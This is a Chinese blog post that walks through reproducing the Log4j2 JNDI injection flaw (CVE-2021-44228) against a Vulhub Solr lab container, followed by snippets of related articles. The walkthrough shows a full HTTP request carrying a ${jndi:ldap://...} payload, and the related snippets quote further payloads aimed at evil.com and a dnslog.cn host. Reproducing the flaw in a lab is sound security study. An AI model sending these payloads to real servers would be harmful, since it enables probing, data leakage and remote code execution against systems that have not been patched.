Log4j 2 (CVE-2021-44228)漏洞复现

最新推荐文章于 2025-05-10 07:41:48 发布
最新推荐文章于 2025-05-10 07:41:48 发布
阅读量660 收藏 1
点赞数
分类专栏: # 靶场测试 # 漏洞复现 文章标签: log4j solr java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45677119/article/details/125482913
版权
本文介绍如何通过Vulhub复现Log4j2 (CVE-2021-44228) 漏洞,并详细记录了所需的环境配置及JNDI注入攻击步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

Log4j 2 (CVE-2021-44228)漏洞复现

一、复现环境

Vulhub:https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228

二、复现过程

  1. 拉取docker环境
    在这里插入图片描述
    服务器启动后,便可通过地址:http://your-ip:8983 查看 Apache Solr的Dashboard
  2. JNDI注入

使用bp回放Send有效载荷:

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

找一个DNSLog类网站,便可回显信息:

在这里插入图片描述

log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 882
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1145
vulhub复现cve-2021-44228 log4j漏洞
CVE-2021-44228Log4j2远程代码执行漏洞复现
hcja666的博客
03-12 750
Log4j2(Log for Java) 是apache基金会的一个用于 Java 应用程序的成熟且功能强大的日志记录框架。其作用主要体现在能帮助开发者方便地记录程序运行中的各种信息,如调试信息、业务操作记录、错误信息等,便于快速定位和解决问题,同时也有助于对系统运行状况进行监控和分析。
log4j漏洞复现
最新发布
m0_72199724的博客
05-10 807
Log4j是一个广泛使用的Java日志框架,具有高度灵活性、高效性和可扩展性,适用于调试和监控应用程序。然而,Log4j也暴露了多个安全漏洞,如CVE-2017-5645和CVE-2021-44228CVE-2017-5645是一个反序列化漏洞,攻击者通过发送恶意payload触发代码执行,影响Log4j 2.8.2之前的2.x版本。CVE-2021-44228是一个远程代码执行(RCE)漏洞,攻击者利用JNDI协议加载远程恶意脚本,影响Log4j 2.0到2.15.0-rc2版本。漏洞复现表明,攻击者可
Log4j2漏洞复现CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
CVE-2021-44228漏洞复现
m0_65764670的博客
05-29 3090
漏洞log4j2漏洞log4j2java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
Log4j 远程代码执行漏洞解析(CVE-2021-44228复现
zkaqlaoniao的博客
12-23 637
Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。它是 Log4j 的升级版本,相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。log4j支持JNDI协议。Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。
【vulhub】Log4j2CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 3759
【vulhub】Log4j2CVE-2021-44228漏洞复现
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6236
log4j 漏洞CVE-2021-44228 漏洞复现
log4j漏洞复现CVE-2021-44228
qq_42699326的博客
11-26 919
Log4j 2 是 Apache 基金会开发的一个广泛使用的 Java 日志记录库。CVE-2021-44228 是一个严重的远程代码执行(RCE)漏洞,也被称为 Log4Shell。该漏洞允许攻击者通过构造特定的日志消息来远程执行任意代码。
Log4j2CVE-2021-44228漏洞复现
oiadkt的博客
04-10 587
Log4j2CVE-2021-44228漏洞复现
CVE-2021-44228——Log4j2-RCE漏洞复现
Li-D的博客
06-10 1903
Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞
Apache Log4j2远程代码执行漏洞CVE-2021-44228复现
qq_40640917的博客
01-10 2639
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
Log4j-CVE-2021-44228漏洞复现
MrHatSec的博客
03-31 3322
Log4j-CVE-2021-44228漏洞复现
log4j2-rce-cve-2021-44228 漏洞复现
weicanh的博客
04-29 317
log4j 2.15.0 开始,默认情况下已禁用此行为。从版本 2.16.0(以及 2.12.22.12.3 和 2.3.1)开始,此功能已被完全删除。
apache log4j 2(CVE-2021-44228)漏洞复现
net的博客
04-04 1010
这个漏洞的根本原因在于log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。然而,我们没有对用户输入进行任何过滤或验证,这意味着如果用户输入包含恶意代码,它将会被记录到日志文件中。JNDI 的一种实现,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java。协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j
log4j2漏洞复现 (CVE-2021-44228)
m0_59958467的博客
10-29 1028
log4j2漏洞复现 (CVE-2021-44228)
cve-2021-44228漏洞复现分析
03-03
### CVE-2021-44228 漏洞复现分析 #### Log4j 的介绍 Log4j 是一个广泛使用的Java日志记录库,由Apache软件基金会开发。该库允许开发者通过配置文件灵活控制日志信息的格式、级别以及输出位置。 #### 漏洞概述 CVE-2021-44228是一个存在于Log4j 2.x系列中的严重远程代码执行漏洞。当应用程序使用了受影响版本的日志组件并处理特定模式字符串时,攻击者可以构造恶意输入触发JNDI注入,从而实现任意代码执行或敏感数据泄露[^1]。 #### 复现环境准备 为了安全地研究此漏洞,在隔离环境中搭建测试平台至关重要。通常情况下,这涉及到安装适当的操作系统镜像(如Kali Linux),确保已安装Java Development Kit (JDK),因为目标应用依赖于它来运行。具体来说,对于本案例而言,建议采用JDK 1.8版本[^2]。 #### 构建利用场景 构建模拟攻击的第一步是从GitHub仓库获取专门为此目的设计的工具集——`bkfish/Apache-Log4j-Learning`项目提供了详细的指南和必要的脚本支持。这些资源可以帮助研究人员快速设置好实验条件,并验证不同条件下漏洞的表现形式。 #### 利用方式实例化 一种常见的利用方法是在请求参数中嵌入特殊格式化的字符串表达式`${...}`,其中包含了指向外部LDAP服务器的数据源描述符。例如,向Solr服务发送如下所示的核心管理命令: ```bash http://target/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ib1ozt.dnslog.cn} ``` 这里`${sys:java.version}`会解析成当前系统的Java版本号作为子域名的一部分传递给DNS查询,以此证明存在潜在的安全风险[^4]。 #### 受影响范围确认 一旦成功触发漏洞,可以通过监控网络流量或者查看响应报文中携带的信息判断是否存在异常行为。比如观察到DNS请求中含有预期之外的内容,则表明可能已经遭受了非法入侵尝试;反之如果没有明显的迹象则说明防护措施有效阻止了威胁的发生。 #### 安全加固建议 针对此类高危级别的零日缺陷,官方及时发布了补丁程序修复问题所在之处。因此强烈推荐用户尽快升级至最新稳定版Log4j以消除隐患。除此之外,还应考虑采取其他辅助性的防御策略,诸如限制对外部资源加载权限、启用严格的输入校验机制等手段进一步增强安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值